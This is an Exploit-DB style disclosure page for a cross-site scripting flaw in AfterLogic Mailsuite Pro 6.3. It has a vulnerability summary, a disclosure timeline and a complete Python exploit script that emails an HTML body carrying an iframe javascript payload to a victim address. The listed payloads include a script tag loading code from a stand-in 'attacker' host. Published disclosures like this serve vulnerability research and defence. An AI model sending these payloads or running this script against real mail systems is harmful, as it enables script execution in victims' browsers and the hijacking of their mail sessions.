AfterLogic Mailsuite Pro XSS Vulnerability

vendor:

Mailsuite Pro

by:

loneferret of Offensive Security

5.5

CVSS

MEDIUM

Cross-Site Scripting (XSS)

CWE

Product Name: Mailsuite Pro

Affected Version From: 6.3

Affected Version To: 6.3

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows Server 2003 SP2, Windows 7 Pro SP1 (x86), Windows XP Pro SP3 (x86), MAC OS Lion

2012

AfterLogic Mailsuite Pro XSS Vulnerability

This exploit allows an attacker to inject malicious scripts into the body of an email sent using AfterLogic Mailsuite Pro. The payload can be used to execute arbitrary JavaScript code in the victim's browser.

Mitigation:

The vendor has not provided a patch for this vulnerability. To mitigate the risk, users are advised to avoid opening emails from untrusted sources or enabling HTML rendering in emails.

Source

Exploit-DB raw data:

#!/usr/bin/python

'''

Author: loneferret of Offensive Security
Product: AfterLogic Mailsuite Pro (VMware Appliance)
Version: 6.3
Vendor Site: http://www.afterlogic.com/
Software Download: http://www.afterlogic.com/download/

Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: No response from vendor
08 Aug 2012: Public Disclosure

Installed On: Windows Server 2003 SP2
Client Test OS: Window 7 Pro SP1 (x86)
Browser Used: Internet Explorer 9
Client Test OS: Window XP Pro SP3 (x86)
Browser Used: Internet Explorer 8
Client Test OS: MAC OS Lion
Browser Used: Firefox 12

Injection Point: Body
Injection Payload(s):
1: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
2: <SCRIPT SRC=//attacker/.j>
3: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>

'''

import smtplib, urllib2

payload = """<IFRAME SRC="javascript:alert('XSS');"></IFRAME>"""

def sendMail(dstemail, frmemail, smtpsrv, username, password):
        msg  = "From: hacker@offsec.local\n"
        msg += "To: victim@victim.local\n"
        msg += 'Date: Today\r\n'
        msg += "Subject: XSS\n"
        msg += "Content-type: text/html\n\n"
        msg += "XSS" + payload + "\r\n\r\n"
        server = smtplib.SMTP(smtpsrv)
        server.login(username,password)
        try:
                server.sendmail(frmemail, dstemail, msg)
        except Exception, e:
                print "[-] Failed to send email:"
                print "[*] " + str(e)
        server.quit()

username = "hacker@offsec.local"
password = "123456"
dstemail = "victim@victim.local"
frmemail = "hacker@offsec.local"
smtpsrv  = "172.16.84.171"

print "[*] Sending Email"
sendMail(dstemail, frmemail, smtpsrv, username, password)